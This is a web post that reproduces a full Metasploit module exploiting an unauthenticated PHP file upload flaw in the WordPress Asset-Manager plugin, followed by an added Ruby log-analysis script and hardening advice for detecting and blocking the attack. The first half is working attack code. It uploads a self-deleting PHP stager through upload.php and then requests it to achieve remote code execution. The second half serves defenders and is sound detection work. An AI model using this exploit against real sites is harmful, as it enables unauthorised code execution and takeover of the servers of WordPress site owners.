WordPress Asset-Manager PHP File Upload Vulnerability

Posted 2012-12-31 09:22:33
This module, taken from the Metasploit exploit library, targets a vulnerability found in the WordPress Asset-Manager plugin, version 2.0 and below. The plugin allows PHP files to be uploaded: a user can upload a file into a temporary directory without any authentication, which leads to arbitrary code execution.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          [ 'URL', 'http://www.myhack58.com/' ]
        ],
      'Payload'       =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'
    peer = "#{rhost}:#{rport}"
    payload_name = "#{rand_text_alpha(5)}.php"
    # PHP stager that writes/runs the selected payload and then deletes itself
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # Build the multipart/form-data body; the plugin reads the upload from the
    # "Filedata" form field.
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'data'    => post_data
    })

    # upload.php echoes the stored file name back on success
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # The file lands in the plugin's temp directory under wp-content/uploads,
    # which the web server executes as PHP.
    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
      'method'  => 'GET'
    })

    if res and res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end
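The module above leaves a two-request footprint on the target: a POST to `wp-content/plugins/asset-manager/upload.php` that is answered with HTTP 200 and the stored file name, followed by a GET for a `.php` file under `wp-content/uploads/assets/temp/`. Because the stager is generated with `:unlink_self=>true`, the uploaded file removes itself once it runs, so on a compromised host the web server log is often the only evidence left. The following Ruby script is an added example, not part of the original post or of the Metasploit module: it parses Apache/nginx "combined" access-log lines (the regex and its field names are this example's own), correlates the upload with a later execution from the same client within a time window, and reports each pair. The log lines are constructed for the example.

```ruby
require 'time'

# Apache/nginx "combined" log line. Group names are this example's own choice.
LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<verb>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3}) /

# The two paths the module touches (see the exploit method above).
UPLOAD_PATH = %r{/wp-content/plugins/asset-manager/upload\.php\z}
TEMP_PHP    = %r{/wp-content/uploads/assets/temp/[^/]+\.php\z}

Entry = Struct.new(:ip, :time, :verb, :path, :status)

# Parse one access-log line; returns nil for lines that do not match the format.
def parse_line(line)
  m = LOG_RE.match(line) or return nil
  Entry.new(m[:ip],
            Time.strptime(m[:ts], '%d/%b/%Y:%H:%M:%S %z'),
            m[:verb],
            m[:path].split('?').first,   # drop any query string
            m[:status].to_i)
end

# Scan log lines in order. For every GET of a .php file in the Asset-Manager
# temp directory, look for a successful upload.php POST from the same client
# within `window` seconds before it. Returns one hash per matched pair.
def find_upload_exec(lines, window: 300)
  entries = lines.map { |l| parse_line(l) }.compact
  uploads = Hash.new { |h, k| h[k] = [] }   # client IP => successful upload POSTs
  hits = []
  entries.each do |e|
    if e.verb == 'POST' && UPLOAD_PATH.match?(e.path) && e.status == 200
      uploads[e.ip] << e
    elsif e.verb == 'GET' && TEMP_PHP.match?(e.path)
      up = uploads[e.ip].find { |u| (e.time - u.time).between?(0, window) }
      next unless up
      hits << { ip: e.ip, upload_at: up.time, exec_path: e.path,
                exec_at: e.time, status: e.status }
    end
  end
  hits
end

# Constructed sample log: one upload+execute pair, plus benign and failed traffic.
SAMPLE_LOG = <<~LOG
  203.0.113.7 - - [31/Dec/2012:09:22:10 +0000] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 200 57 "-" "Mozilla/5.0"
  203.0.113.7 - - [31/Dec/2012:09:22:11 +0000] "GET /wordpress/wp-content/uploads/assets/temp/kqzxw.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
  198.51.100.4 - - [31/Dec/2012:09:30:00 +0000] "GET /wordpress/wp-content/uploads/assets/temp/photo.jpg HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
  198.51.100.4 - - [31/Dec/2012:09:31:00 +0000] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 403 12 "-" "Mozilla/5.0"
  192.0.2.9 - - [31/Dec/2012:09:40:00 +0000] "GET /wordpress/wp-content/uploads/assets/temp/kqzxw.php HTTP/1.1" 404 0 "-" "curl/7.26"
LOG

if __FILE__ == $0
  find_upload_exec(SAMPLE_LOG.lines).each do |h|
    puts "#{h[:ip]} uploaded at #{h[:upload_at]} then requested #{h[:exec_path]} at #{h[:exec_at]} (HTTP #{h[:status]})"
  end
end
```

Correlating by client IP is a deliberate simplification: an attacker can upload from one address and trigger the file from another, so in a real deployment treat any 200 response to a POST on `upload.php` from an unauthenticated client as a finding on its own, and any `.php` request under `wp-content/uploads/` as a second one. The `uploads/` tree should never execute PHP in the first place; a server rule that denies `.php` handling there blocks this module's second step even if the upload succeeds.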